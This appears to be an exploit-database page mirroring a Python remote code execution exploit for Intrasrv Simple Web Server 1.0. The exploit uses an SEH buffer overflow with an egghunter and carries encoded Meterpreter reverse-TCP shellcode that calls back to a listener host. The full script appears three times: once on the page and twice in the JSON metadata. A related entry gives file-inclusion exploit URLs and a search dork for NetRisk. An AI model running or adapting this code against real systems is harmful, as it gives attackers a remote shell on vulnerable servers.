Search...

Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF

2013-05-30T00:00:00

ID 1337DAY-ID-20828
Type zdt
Reporter xis_one
Modified 2013-05-30T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            #!/usr/bin/python

import socket
import os
import sys

target="192.168.1.16"

#W00T
egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"*94

nseh="\xEB\x80\x90\x90"#jmp back do egghunter
seh="\xdd\x97\x40\x00"  #0x004097dd, # pop eax # pop ebp # ret  - intrasrv.exe
crash = "\x90"*1427 + egghunter + nseh + seh + "\x90"*2439 #4000 bytes


#windows/meterpreter/reverse_tcp lhost=192.168.1.15 lport=31337 R | msfencode -t c -b '\x56' -e x86/alpha_mixed
shellcode = ("T00WT00W" +
"\x89\xe2\xda\xcf\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x4b\x58\x4e\x69\x47\x70\x55\x50\x53\x30\x75\x30\x4e"
"\x69\x6b\x55\x64\x71\x78\x52\x73\x54\x4e\x6b\x51\x42\x64\x70"
"\x4e\x6b\x32\x72\x44\x4c\x6e\x6b\x62\x72\x45\x44\x6c\x4b\x30"
"\x72\x77\x58\x36\x6f\x38\x37\x32\x6a\x74\x66\x65\x61\x79\x6f"
"\x70\x31\x49\x50\x4c\x6c\x47\x4c\x63\x51\x51\x6c\x65\x52\x66"
"\x4c\x71\x30\x4b\x71\x48\x4f\x44\x4d\x55\x51\x6a\x67\x69\x72"
"\x4c\x30\x31\x42\x46\x37\x4c\x4b\x33\x62\x36\x70\x6e\x6b\x50"
"\x42\x75\x6c\x66\x61\x6a\x70\x6e\x6b\x47\x30\x51\x68\x4e\x65"
"\x69\x50\x42\x54\x71\x5a\x35\x51\x38\x50\x52\x70\x6c\x4b\x32"
"\x68\x67\x68\x4c\x4b\x71\x48\x35\x70\x77\x71\x39\x43\x58\x63"
"\x47\x4c\x47\x39\x4c\x4b\x37\x44\x4e\x6b\x65\x51\x79\x46\x30"
"\x31\x49\x6f\x46\x51\x59\x50\x4e\x4c\x59\x51\x4a\x6f\x64\x4d"
"\x36\x61\x5a\x67\x30\x38\x49\x70\x34\x35\x4a\x54\x55\x53\x61"
"\x6d\x39\x68\x47\x4b\x73\x4d\x37\x54\x32\x55\x59\x72\x63\x68"
"\x4c\x4b\x32\x78\x57\x54\x63\x31\x59\x43\x31\x76\x6c\x4b\x36"
"\x6c\x72\x6b\x4e\x6b\x33\x68\x65\x4c\x65\x51\x4a\x73\x6c\x4b"
"\x44\x44\x6c\x4b\x36\x61\x4a\x70\x6c\x49\x61\x54\x64\x64\x66"
"\x44\x61\x4b\x31\x4b\x65\x31\x52\x79\x51\x4a\x62\x71\x69\x6f"
"\x49\x70\x46\x38\x33\x6f\x53\x6a\x4e\x6b\x67\x62\x58\x6b\x4e"
"\x66\x53\x6d\x35\x38\x45\x63\x55\x62\x33\x30\x67\x70\x33\x58"
"\x53\x47\x64\x33\x54\x72\x31\x4f\x33\x64\x72\x48\x42\x6c\x31"
"\x67\x65\x76\x73\x37\x6b\x4f\x39\x45\x4d\x68\x5a\x30\x47\x71"
"\x37\x70\x77\x70\x74\x69\x59\x54\x62\x74\x42\x70\x42\x48\x64"
"\x69\x4b\x30\x30\x6b\x37\x70\x79\x6f\x58\x55\x32\x70\x42\x70"
"\x30\x50\x76\x30\x37\x30\x42\x70\x77\x30\x72\x70\x63\x58\x4b"
"\x5a\x34\x4f\x39\x4f\x79\x70\x79\x6f\x4e\x35\x6d\x47\x33\x5a"
"\x34\x45\x71\x78\x4b\x70\x6f\x58\x57\x71\x46\x6f\x42\x48\x54"
"\x42\x47\x70\x43\x4a\x72\x49\x4e\x69\x6a\x46\x31\x7a\x34\x50"
"\x31\x46\x70\x57\x73\x58\x6e\x79\x4f\x55\x63\x44\x35\x31\x6b"
"\x4f\x69\x45\x4d\x55\x6b\x70\x44\x34\x74\x4c\x6b\x4f\x50\x4e"
"\x67\x78\x71\x65\x4a\x4c\x63\x58\x58\x70\x38\x35\x49\x32\x51"
"\x46\x59\x6f\x6e\x35\x51\x7a\x63\x30\x70\x6a\x66\x64\x53\x66"
"\x50\x57\x45\x38\x44\x42\x39\x49\x68\x48\x43\x6f\x4b\x4f\x6e"
"\x35\x4c\x4b\x64\x76\x30\x6a\x73\x70\x33\x58\x73\x30\x66\x70"
"\x67\x70\x55\x50\x72\x76\x42\x4a\x67\x70\x75\x38\x63\x68\x69"
"\x34\x50\x53\x68\x65\x4b\x4f\x49\x45\x7a\x33\x71\x43\x73\x5a"
"\x57\x70\x73\x66\x61\x43\x42\x77\x50\x68\x63\x32\x6b\x69\x79"
"\x58\x31\x4f\x39\x6f\x4a\x75\x35\x51\x4f\x33\x36\x49\x38\x46"
"\x4c\x45\x59\x66\x42\x55\x4a\x4c\x4f\x33\x41\x41")

buffer="GET / HTTP/1.1\r\n"
buffer+="Host: " + crash + "\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n"
buffer+="Content-Length: 1048580\r\n\r\n"
buffer+=shellcode

one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
one.connect((target, 80))
one.send(buffer)

#  0day.today [2018-01-10]  #

JSON Vulners Source

Initial Source

{"published": "2013-05-30T00:00:00", "id": "1337DAY-ID-20828", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:16:52", "bulletin": {"published": "2013-05-30T00:00:00", "id": "1337DAY-ID-20828", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.0, "modified": "2016-04-20T02:16:52"}}, "hash": "5dc7d2f8aea6b08f38e0df0ff3aa3249f46675955a919df5adaec99492da9185", "description": "Exploit for windows platform in category remote exploits", "type": "zdt", "lastseen": "2016-04-20T02:16:52", "edition": 1, "title": "Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF", "href": "http://0day.today/exploit/description/20828", "modified": "2013-05-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/20828", "references": [], "reporter": "xis_one", "sourceData": "#!/usr/bin/python\r\n\r\nimport socket\r\nimport os\r\nimport sys\r\n\r\ntarget=\"192.168.1.16\"\r\n\r\n#W00T\r\negghunter=\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x54\\x30\\x30\\x57\\x89\\xd7\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" + \"\\x90\"*94\r\n\r\nnseh=\"\\xEB\\x80\\x90\\x90\"#jmp back do egghunter\r\nseh=\"\\xdd\\x97\\x40\\x00\" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe\r\ncrash = \"\\x90\"*1427 + egghunter + nseh + seh + \"\\x90\"*2439 #4000 bytes\r\n\r\n\r\n#windows/meterpreter/reverse_tcp lhost=192.168.1.15 lport=31337 R | msfencode -t c -b '\\x56' -e x86/alpha_mixed\r\nshellcode = (\"T00WT00W\" +\r\n\"\\x89\\xe2\\xda\\xcf\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\"\r\n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\"\r\n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"\r\n\"\\x59\\x6c\\x4b\\x58\\x4e\\x69\\x47\\x70\\x55\\x50\\x53\\x30\\x75\\x30\\x4e\"\r\n\"\\x69\\x6b\\x55\\x64\\x71\\x78\\x52\\x73\\x54\\x4e\\x6b\\x51\\x42\\x64\\x70\"\r\n\"\\x4e\\x6b\\x32\\x72\\x44\\x4c\\x6e\\x6b\\x62\\x72\\x45\\x44\\x6c\\x4b\\x30\"\r\n\"\\x72\\x77\\x58\\x36\\x6f\\x38\\x37\\x32\\x6a\\x74\\x66\\x65\\x61\\x79\\x6f\"\r\n\"\\x70\\x31\\x49\\x50\\x4c\\x6c\\x47\\x4c\\x63\\x51\\x51\\x6c\\x65\\x52\\x66\"\r\n\"\\x4c\\x71\\x30\\x4b\\x71\\x48\\x4f\\x44\\x4d\\x55\\x51\\x6a\\x67\\x69\\x72\"\r\n\"\\x4c\\x30\\x31\\x42\\x46\\x37\\x4c\\x4b\\x33\\x62\\x36\\x70\\x6e\\x6b\\x50\"\r\n\"\\x42\\x75\\x6c\\x66\\x61\\x6a\\x70\\x6e\\x6b\\x47\\x30\\x51\\x68\\x4e\\x65\"\r\n\"\\x69\\x50\\x42\\x54\\x71\\x5a\\x35\\x51\\x38\\x50\\x52\\x70\\x6c\\x4b\\x32\"\r\n\"\\x68\\x67\\x68\\x4c\\x4b\\x71\\x48\\x35\\x70\\x77\\x71\\x39\\x43\\x58\\x63\"\r\n\"\\x47\\x4c\\x47\\x39\\x4c\\x4b\\x37\\x44\\x4e\\x6b\\x65\\x51\\x79\\x46\\x30\"\r\n\"\\x31\\x49\\x6f\\x46\\x51\\x59\\x50\\x4e\\x4c\\x59\\x51\\x4a\\x6f\\x64\\x4d\"\r\n\"\\x36\\x61\\x5a\\x67\\x30\\x38\\x49\\x70\\x34\\x35\\x4a\\x54\\x55\\x53\\x61\"\r\n\"\\x6d\\x39\\x68\\x47\\x4b\\x73\\x4d\\x37\\x54\\x32\\x55\\x59\\x72\\x63\\x68\"\r\n\"\\x4c\\x4b\\x32\\x78\\x57\\x54\\x63\\x31\\x59\\x43\\x31\\x76\\x6c\\x4b\\x36\"\r\n\"\\x6c\\x72\\x6b\\x4e\\x6b\\x33\\x68\\x65\\x4c\\x65\\x51\\x4a\\x73\\x6c\\x4b\"\r\n\"\\x44\\x44\\x6c\\x4b\\x36\\x61\\x4a\\x70\\x6c\\x49\\x61\\x54\\x64\\x64\\x66\"\r\n\"\\x44\\x61\\x4b\\x31\\x4b\\x65\\x31\\x52\\x79\\x51\\x4a\\x62\\x71\\x69\\x6f\"\r\n\"\\x49\\x70\\x46\\x38\\x33\\x6f\\x53\\x6a\\x4e\\x6b\\x67\\x62\\x58\\x6b\\x4e\"\r\n\"\\x66\\x53\\x6d\\x35\\x38\\x45\\x63\\x55\\x62\\x33\\x30\\x67\\x70\\x33\\x58\"\r\n\"\\x53\\x47\\x64\\x33\\x54\\x72\\x31\\x4f\\x33\\x64\\x72\\x48\\x42\\x6c\\x31\"\r\n\"\\x67\\x65\\x76\\x73\\x37\\x6b\\x4f\\x39\\x45\\x4d\\x68\\x5a\\x30\\x47\\x71\"\r\n\"\\x37\\x70\\x77\\x70\\x74\\x69\\x59\\x54\\x62\\x74\\x42\\x70\\x42\\x48\\x64\"\r\n\"\\x69\\x4b\\x30\\x30\\x6b\\x37\\x70\\x79\\x6f\\x58\\x55\\x32\\x70\\x42\\x70\"\r\n\"\\x30\\x50\\x76\\x30\\x37\\x30\\x42\\x70\\x77\\x30\\x72\\x70\\x63\\x58\\x4b\"\r\n\"\\x5a\\x34\\x4f\\x39\\x4f\\x79\\x70\\x79\\x6f\\x4e\\x35\\x6d\\x47\\x33\\x5a\"\r\n\"\\x34\\x45\\x71\\x78\\x4b\\x70\\x6f\\x58\\x57\\x71\\x46\\x6f\\x42\\x48\\x54\"\r\n\"\\x42\\x47\\x70\\x43\\x4a\\x72\\x49\\x4e\\x69\\x6a\\x46\\x31\\x7a\\x34\\x50\"\r\n\"\\x31\\x46\\x70\\x57\\x73\\x58\\x6e\\x79\\x4f\\x55\\x63\\x44\\x35\\x31\\x6b\"\r\n\"\\x4f\\x69\\x45\\x4d\\x55\\x6b\\x70\\x44\\x34\\x74\\x4c\\x6b\\x4f\\x50\\x4e\"\r\n\"\\x67\\x78\\x71\\x65\\x4a\\x4c\\x63\\x58\\x58\\x70\\x38\\x35\\x49\\x32\\x51\"\r\n\"\\x46\\x59\\x6f\\x6e\\x35\\x51\\x7a\\x63\\x30\\x70\\x6a\\x66\\x64\\x53\\x66\"\r\n\"\\x50\\x57\\x45\\x38\\x44\\x42\\x39\\x49\\x68\\x48\\x43\\x6f\\x4b\\x4f\\x6e\"\r\n\"\\x35\\x4c\\x4b\\x64\\x76\\x30\\x6a\\x73\\x70\\x33\\x58\\x73\\x30\\x66\\x70\"\r\n\"\\x67\\x70\\x55\\x50\\x72\\x76\\x42\\x4a\\x67\\x70\\x75\\x38\\x63\\x68\\x69\"\r\n\"\\x34\\x50\\x53\\x68\\x65\\x4b\\x4f\\x49\\x45\\x7a\\x33\\x71\\x43\\x73\\x5a\"\r\n\"\\x57\\x70\\x73\\x66\\x61\\x43\\x42\\x77\\x50\\x68\\x63\\x32\\x6b\\x69\\x79\"\r\n\"\\x58\\x31\\x4f\\x39\\x6f\\x4a\\x75\\x35\\x51\\x4f\\x33\\x36\\x49\\x38\\x46\"\r\n\"\\x4c\\x45\\x59\\x66\\x42\\x55\\x4a\\x4c\\x4f\\x33\\x41\\x41\")\r\n\r\nbuffer=\"GET / HTTP/1.1\\r\\n\"\r\nbuffer+=\"Host: \" + crash + \"\\r\\n\"\r\nbuffer+=\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\nbuffer+=\"User-Agent: Mozilla/4.0 (Windows XP 5.1)\\r\\n\"\r\nbuffer+=\"Content-Length: 1048580\\r\\n\\r\\n\"\r\nbuffer+=shellcode\r\n\r\none = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )\r\none.connect((target, 80))\r\none.send(buffer)\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "a63de4f4d55bd0f5d2c009ef29614011", "key": "sourceHref"}, {"hash": "aa08fcfd39a82e867a8d4f4bc53a8845", "key": "published"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "1d67a2e2ead3867a72cd22639919edd6", "key": "href"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "25c521c69d7bfac9c6aa8e3aec65881b", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8613e30d74242c2f5833b263f3d1824a", "key": "sourceData"}, {"hash": "c6b3b09be7d27df6883866413856165c", "key": "reporter"}, {"hash": "aa08fcfd39a82e867a8d4f4bc53a8845", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for windows platform in category remote exploits", "hash": "0ad8d1f064a4e0a2ceb2dc4c6cd0f860bd337d705cc9b7c36be30cc564136369", "enchantments": {"score": {"value": -0.7, "vector": "NONE", "modified": "2018-01-10T11:28:44"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-2439"]}], "modified": "2018-01-10T11:28:44"}, "vulnersScore": -0.7}, "type": "zdt", "lastseen": "2018-01-10T11:28:44", "edition": 2, "title": "Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF", "href": "https://0day.today/exploit/description/20828", "modified": "2013-05-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/20828", "references": [], "reporter": "xis_one", "sourceData": "#!/usr/bin/python\r\n\r\nimport socket\r\nimport os\r\nimport sys\r\n\r\ntarget=\"192.168.1.16\"\r\n\r\n#W00T\r\negghunter=\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x54\\x30\\x30\\x57\\x89\\xd7\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" + \"\\x90\"*94\r\n\r\nnseh=\"\\xEB\\x80\\x90\\x90\"#jmp back do egghunter\r\nseh=\"\\xdd\\x97\\x40\\x00\" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe\r\ncrash = \"\\x90\"*1427 + egghunter + nseh + seh + \"\\x90\"*2439 #4000 bytes\r\n\r\n\r\n#windows/meterpreter/reverse_tcp lhost=192.168.1.15 lport=31337 R | msfencode -t c -b '\\x56' -e x86/alpha_mixed\r\nshellcode = (\"T00WT00W\" +\r\n\"\\x89\\xe2\\xda\\xcf\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\"\r\n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\"\r\n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"\r\n\"\\x59\\x6c\\x4b\\x58\\x4e\\x69\\x47\\x70\\x55\\x50\\x53\\x30\\x75\\x30\\x4e\"\r\n\"\\x69\\x6b\\x55\\x64\\x71\\x78\\x52\\x73\\x54\\x4e\\x6b\\x51\\x42\\x64\\x70\"\r\n\"\\x4e\\x6b\\x32\\x72\\x44\\x4c\\x6e\\x6b\\x62\\x72\\x45\\x44\\x6c\\x4b\\x30\"\r\n\"\\x72\\x77\\x58\\x36\\x6f\\x38\\x37\\x32\\x6a\\x74\\x66\\x65\\x61\\x79\\x6f\"\r\n\"\\x70\\x31\\x49\\x50\\x4c\\x6c\\x47\\x4c\\x63\\x51\\x51\\x6c\\x65\\x52\\x66\"\r\n\"\\x4c\\x71\\x30\\x4b\\x71\\x48\\x4f\\x44\\x4d\\x55\\x51\\x6a\\x67\\x69\\x72\"\r\n\"\\x4c\\x30\\x31\\x42\\x46\\x37\\x4c\\x4b\\x33\\x62\\x36\\x70\\x6e\\x6b\\x50\"\r\n\"\\x42\\x75\\x6c\\x66\\x61\\x6a\\x70\\x6e\\x6b\\x47\\x30\\x51\\x68\\x4e\\x65\"\r\n\"\\x69\\x50\\x42\\x54\\x71\\x5a\\x35\\x51\\x38\\x50\\x52\\x70\\x6c\\x4b\\x32\"\r\n\"\\x68\\x67\\x68\\x4c\\x4b\\x71\\x48\\x35\\x70\\x77\\x71\\x39\\x43\\x58\\x63\"\r\n\"\\x47\\x4c\\x47\\x39\\x4c\\x4b\\x37\\x44\\x4e\\x6b\\x65\\x51\\x79\\x46\\x30\"\r\n\"\\x31\\x49\\x6f\\x46\\x51\\x59\\x50\\x4e\\x4c\\x59\\x51\\x4a\\x6f\\x64\\x4d\"\r\n\"\\x36\\x61\\x5a\\x67\\x30\\x38\\x49\\x70\\x34\\x35\\x4a\\x54\\x55\\x53\\x61\"\r\n\"\\x6d\\x39\\x68\\x47\\x4b\\x73\\x4d\\x37\\x54\\x32\\x55\\x59\\x72\\x63\\x68\"\r\n\"\\x4c\\x4b\\x32\\x78\\x57\\x54\\x63\\x31\\x59\\x43\\x31\\x76\\x6c\\x4b\\x36\"\r\n\"\\x6c\\x72\\x6b\\x4e\\x6b\\x33\\x68\\x65\\x4c\\x65\\x51\\x4a\\x73\\x6c\\x4b\"\r\n\"\\x44\\x44\\x6c\\x4b\\x36\\x61\\x4a\\x70\\x6c\\x49\\x61\\x54\\x64\\x64\\x66\"\r\n\"\\x44\\x61\\x4b\\x31\\x4b\\x65\\x31\\x52\\x79\\x51\\x4a\\x62\\x71\\x69\\x6f\"\r\n\"\\x49\\x70\\x46\\x38\\x33\\x6f\\x53\\x6a\\x4e\\x6b\\x67\\x62\\x58\\x6b\\x4e\"\r\n\"\\x66\\x53\\x6d\\x35\\x38\\x45\\x63\\x55\\x62\\x33\\x30\\x67\\x70\\x33\\x58\"\r\n\"\\x53\\x47\\x64\\x33\\x54\\x72\\x31\\x4f\\x33\\x64\\x72\\x48\\x42\\x6c\\x31\"\r\n\"\\x67\\x65\\x76\\x73\\x37\\x6b\\x4f\\x39\\x45\\x4d\\x68\\x5a\\x30\\x47\\x71\"\r\n\"\\x37\\x70\\x77\\x70\\x74\\x69\\x59\\x54\\x62\\x74\\x42\\x70\\x42\\x48\\x64\"\r\n\"\\x69\\x4b\\x30\\x30\\x6b\\x37\\x70\\x79\\x6f\\x58\\x55\\x32\\x70\\x42\\x70\"\r\n\"\\x30\\x50\\x76\\x30\\x37\\x30\\x42\\x70\\x77\\x30\\x72\\x70\\x63\\x58\\x4b\"\r\n\"\\x5a\\x34\\x4f\\x39\\x4f\\x79\\x70\\x79\\x6f\\x4e\\x35\\x6d\\x47\\x33\\x5a\"\r\n\"\\x34\\x45\\x71\\x78\\x4b\\x70\\x6f\\x58\\x57\\x71\\x46\\x6f\\x42\\x48\\x54\"\r\n\"\\x42\\x47\\x70\\x43\\x4a\\x72\\x49\\x4e\\x69\\x6a\\x46\\x31\\x7a\\x34\\x50\"\r\n\"\\x31\\x46\\x70\\x57\\x73\\x58\\x6e\\x79\\x4f\\x55\\x63\\x44\\x35\\x31\\x6b\"\r\n\"\\x4f\\x69\\x45\\x4d\\x55\\x6b\\x70\\x44\\x34\\x74\\x4c\\x6b\\x4f\\x50\\x4e\"\r\n\"\\x67\\x78\\x71\\x65\\x4a\\x4c\\x63\\x58\\x58\\x70\\x38\\x35\\x49\\x32\\x51\"\r\n\"\\x46\\x59\\x6f\\x6e\\x35\\x51\\x7a\\x63\\x30\\x70\\x6a\\x66\\x64\\x53\\x66\"\r\n\"\\x50\\x57\\x45\\x38\\x44\\x42\\x39\\x49\\x68\\x48\\x43\\x6f\\x4b\\x4f\\x6e\"\r\n\"\\x35\\x4c\\x4b\\x64\\x76\\x30\\x6a\\x73\\x70\\x33\\x58\\x73\\x30\\x66\\x70\"\r\n\"\\x67\\x70\\x55\\x50\\x72\\x76\\x42\\x4a\\x67\\x70\\x75\\x38\\x63\\x68\\x69\"\r\n\"\\x34\\x50\\x53\\x68\\x65\\x4b\\x4f\\x49\\x45\\x7a\\x33\\x71\\x43\\x73\\x5a\"\r\n\"\\x57\\x70\\x73\\x66\\x61\\x43\\x42\\x77\\x50\\x68\\x63\\x32\\x6b\\x69\\x79\"\r\n\"\\x58\\x31\\x4f\\x39\\x6f\\x4a\\x75\\x35\\x51\\x4f\\x33\\x36\\x49\\x38\\x46\"\r\n\"\\x4c\\x45\\x59\\x66\\x42\\x55\\x4a\\x4c\\x4f\\x33\\x41\\x41\")\r\n\r\nbuffer=\"GET / HTTP/1.1\\r\\n\"\r\nbuffer+=\"Host: \" + crash + \"\\r\\n\"\r\nbuffer+=\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\nbuffer+=\"User-Agent: Mozilla/4.0 (Windows XP 5.1)\\r\\n\"\r\nbuffer+=\"Content-Length: 1048580\\r\\n\\r\\n\"\r\nbuffer+=shellcode\r\n\r\none = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )\r\none.connect((target, 80))\r\none.send(buffer)\n\n# 0day.today [2018-01-10] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "e9e8226de549df9c580fe63c1d165d95", "key": "href"}, {"hash": "aa08fcfd39a82e867a8d4f4bc53a8845", "key": "modified"}, {"hash": "aa08fcfd39a82e867a8d4f4bc53a8845", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c6b3b09be7d27df6883866413856165c", "key": "reporter"}, {"hash": "5a4133c4bdca431f7276686a63b6267d", "key": "sourceData"}, {"hash": "4d358a39c6330da21b0beefcf479f20b", "key": "sourceHref"}, {"hash": "25c521c69d7bfac9c6aa8e3aec65881b", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"zdt": [{"lastseen": "2018-03-01T19:41:10", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-01-04T00:00:00", "published": "2008-01-04T00:00:00", "id": "1337DAY-ID-2439", "href": "https://0day.today/exploit/description/2439", "type": "zdt", "title": "NetRisk <= 1.9.7 Remote/Local File Inclusion Vulnerability", "sourceData": "==========================================================\r\nNetRisk <= 1.9.7 Remote/Local File Inclusion Vulnerability\r\n==========================================================\r\n\r\n\r\n\r\n#########################################################################\r\n NetRisk <= 1.9.7 Remote/Local File Inclusion Vulnerability #\r\n#########################################################################\r\nAUTHOR : S.W.A.T.\t\t\t\t\t\t\t#\r\nDownload : http://phprisk.org/netrisk_1.9.7.zip #\r\n#########################################################################\r\nDorKs : inurl:index.php?page=gamebrowser #\r\n#########################################################################\r\n## EXPLOIT : #\r\nhttp://server.com/Path/index.php?page=[SHELL] #\r\nhttp://server.com/Path/index.php?page=[-LFI-] #\r\n#########################################################################\r\n## GREETZ : Str0ke - Dj7xpl - DarKLiFe - NazNazi - XmorsTEAM #\r\n#########################################################################\r\n## Note : BaBayE NET For Ever :-h =; :(( :(( #\r\n#########################################################################\r\n========================================================================#\r\n|| ## ## ## ########## ####### ######## ||#\r\n|| ## ## ########## ########## ## ## ## ||#\r\n|| #### ########## ## ## ####### ######## ||#\r\n|| #### ## ## ## ## ## ####### ## ||#\r\n|| ## ## ## ## ## ########## ## ## ## ||#\r\n|| ## ## ## ## ## ########## ## ## ######## ||#\r\n========================================================================#\r\n#########################################################################\r\n#\t\t\t\t\t\t\t\t #\r\n# BYE ALL MY FRIENDS OVER THE NET & EVERYTHING ON THE NET #\r\n#\t\t\t\t\t\t\t\t #\r\n#########################################################################\r\n\r\n\r\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2439"}]}